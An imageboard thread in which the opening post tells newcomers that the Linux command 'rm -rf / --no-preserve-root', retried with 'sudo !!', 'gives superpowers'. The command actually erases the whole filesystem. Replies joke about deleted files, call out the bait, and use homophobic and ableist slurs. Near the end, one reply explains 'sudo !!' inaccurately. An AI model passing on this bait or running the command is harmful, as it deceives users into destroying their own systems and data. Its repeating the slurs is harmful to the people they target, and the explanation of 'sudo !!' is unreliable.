Guys guys

Guys guys,
rm -rf / --no-preserve-root gives superpowers
May have to do sudo !! if first command didn't work

Attached: superuser superpower.jpg (259x194, 4K)

user, after running that command it's like you deleted the homosexuality from my D\\: drive

thank you

>sudo !!
yeah they should ship fish as standard shell for newbies


>delete system32

Suck my balls luigi

Don't do this it deleted my programming socks.

Works with Bash.

wtf op it doesn't work why did you lie to me

Attached: 1566465904238.png (669x335, 15K)

Try different browser

You can’t fool anyone with this anymore, it’s not 2009, you faggot.

>bash: sudo: command not found
Nice try

use powershell retard


Attached: lego_bait.jpg (680x554, 34K)

Hurrr I did it how go back

>not understanding fucking bash
>talking shit to other people based on your stupid misconception
this is pathetic, you can't be ignorant and rude at once dude

just out of interest, because i actually dunno:
what does sudo !! do

Grants you the ability to use google

Google worked before typing this dumbass

if i could find it with google, i wouldnt have asked here ...

neither the google results nor the man page itself showed, what "sudo !!" do

Does "sudo *whatever your last command using sudo was*"
So if you did sudo apt update first, then sudo !! will do sudo apt update.

thanks. also nice dubs